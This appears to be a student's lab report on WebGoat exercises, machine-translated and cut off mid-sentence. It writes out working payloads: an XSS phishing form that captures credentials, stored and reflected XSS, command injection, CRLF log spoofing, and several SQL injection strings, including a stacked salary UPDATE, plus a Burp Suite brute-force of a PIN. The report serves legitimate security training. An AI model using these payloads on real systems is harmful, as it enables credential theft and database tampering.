20155323 Liu Willang "Cyber Confrontation" EXP9 Web Security Foundation

20155323 Liu Willang "Cyber Confrontation" EXP9 Web Security Foundation Practical purpose

Understand the fundamentals of commonly used network attack techniques.

Practice Content

Webgoat the experiment in practice.

The practice process opens webgoat

Webgoat is a flawed Java EE Web application maintained by owasp, which is not a bug in the program, but is deliberately designed for Web application security training. This app provides a realistic simulation of the teaching environment, providing users with clues about completing the course.

We enter the command under the terminal java -jar webgoat-container-7.0.1-war-exec.jar and wait until it is finished, the Webgoat service opens. , the service occupies a port of 8080.

We can then open the 8080 port in the browser localhost:8080/WebGoat to enter the Webgoat, you can log in with the default account password in the image.

Phishing with XSS

The topic is the cross-site scripting phishing attack, which requires us to enter the XSS attack code in the search box to read the username and password entered by the attacker.

`</form>    <script>function hack(){ XSSImage=new Image;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);}   </script><form name="phish"><br><br><HR><H2>This feature requires account login:</H2><br>  <br>Enter Username:<br><input type="text" name="user"> <br>Enter Password:<br><input type="password" name = "pass"><br> <input type="submit" name="login" value="login"    onclick="hack()"></form><br><br><HR>`

Add the code to the search box and click Search, and then enter any user name password and submit it to show that the attack was successful. We got the username and password of the attacker.

Stored XSS Attacks

Storage-type XSS attack, we in the message board to make a malicious message, click on this message will be able to see the information we left.

Enter the code in the message box <script>alert("20155323lwl");</script> and submit, then click on the link, you can show the attack success.

Reflected XSS Attacks

A reflective XSS attack that inserts a piece of code that a browser can interpret in the input box, which is equivalent to embedding it in value, which the browser interprets.

Enter in the Code box <script>alert("20155323lwl");</script> , click Purchase the dialog will appear to show that the attack was successful.

Command Injection

Command injection, requires the operating system to inject command line and be able to execute system commands on the target host, we open the source code interface search BackDoors , BackDoors.help after adding a piece & netstat -an & ipconfig of code, the purpose is to inject netstat- An and Ifconfig both system commands to obtain IP and network port usage.

After modifying the selected value and clicking View, we can get the network port usage and IP address of this machine.

Numeric SQL Injection

Digital SQL injection requires that we use SQL injection to get all the weather data.

First in the source code to modify, after any value in station to add the 1=1, and then attack, we can get all the city weather data.

Log Spoofing

Log spoofing, using the format of the log, using characters such as newline to inject malicious strings, according to rules to forge logs to deceive administrators.

We can enter a command in the User name box PC%0d%0aLogin Succeeded for username: admin , inject carriage return%0d and newline character%0a, leave a false login success log.

String SQL Injection

SQL string injection, attempting to inject a string using the ' Smith ' username to display all the user's credit card numbers.

In fact, the user name is not the key, enter any user name or not input can be, mainly to add the user name after the eternal, this is the simplest SQL injection attack.

Stage 1:string SQL Injection

A string SQL injection is required to bypass authentication, and we still use the perpetual Truth in the Password box, but we find that the login failed. Open source we can find that the maximum length of the password is 8, we change the maximum length to 100, and then enter in the password field ‘ or 1=1 -- to log in, '-' as the comment symbol.

Stage 3:numeric SQL Injection

Require SQL injection through authentication, and use normal employee permissions to get the Boss account information.

Or do the previous steps to log into the employee account, and then search in the source code value , after 101 with the eternal or 1=1 order by salary desc-- , and then click Viewprofile we can see the boss's account information.

Database backdoors

Database backdoor, first we can enter 101 to view the user information

Then we can enter the SQL statement to modify the content of the information, 101; update employee set salary=1000000 where userid=101； the salary we changed to 100.

We can also use SQL injection to create a trigger that will modify the mailbox as your mailbox when creating a new user.

Blind Numeric SQL Injection

Digital blinds, sometimes we don't get the information we need, so we can judge by the conditions of the SQL statement. For example, using dichotomy to judge and gradually narrow the interval.

First enter to 101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 500 ); determine whether the pin value is greater than 500, the result shows Account number is valid that the description is indeed greater than 500

We will change to 2000, the discovery is greater than 2000, and then try 3000, shown here invalid account number , the error, this time the PIN value range between 2000-3000.

Using Burpsuite, intercept messages for brute force, because 8080 ports are occupied, we add a new port and tick.

Then select the new port you just set in the browser's port settings.

Click Go on the Webgoat side, capture the message right after the selection send to intruder , and then set the load, from 2000 to 3000, the number of steps is 1, set to start the attack after the completion.

Finally, we found that 2364 is clearly different from the others.

Enter 2364 for verification.

Answer the question

(1) SQL injection attack principle, how to defend

The principle is that the user enters data without checking or not being fully inspected, and unexpectedly becomes code executed. There are two main forms. The first is to insert the code directly into the user input variable that is concatenated with the SQL command and make it executable, also known as the direct injection attack method. The second is an indirect attack method that injects malicious code into a string to be stored in a table or stored as the original data. The stored string is connected to a dynamic SQL command to execute some malicious SQL code.

Defensive means can be restricted user rights, strict provisions of the input format, filter out special characters to prevent the occurrence of such statements as the eternal truth.

(2) The principle of XSS attack, how to defend

The principle is to inject executable code into the Web page and successfully executed by the browser, to achieve the purpose of the attack, to form an effective XSS attack, once the attack succeeds, it can get the user's contact list, and then send a false scam information to the contact, you can delete the user's log and so on, It is sometimes implemented in conjunction with other attack methods such as SQL injection attack server and database, click Hijacking, Relative link hijacking, and other phishing implementations.

Defensive means can be strictly filtered, for

20155323 Liu Willang "Cyber Confrontation" EXP9 Web Security Foundation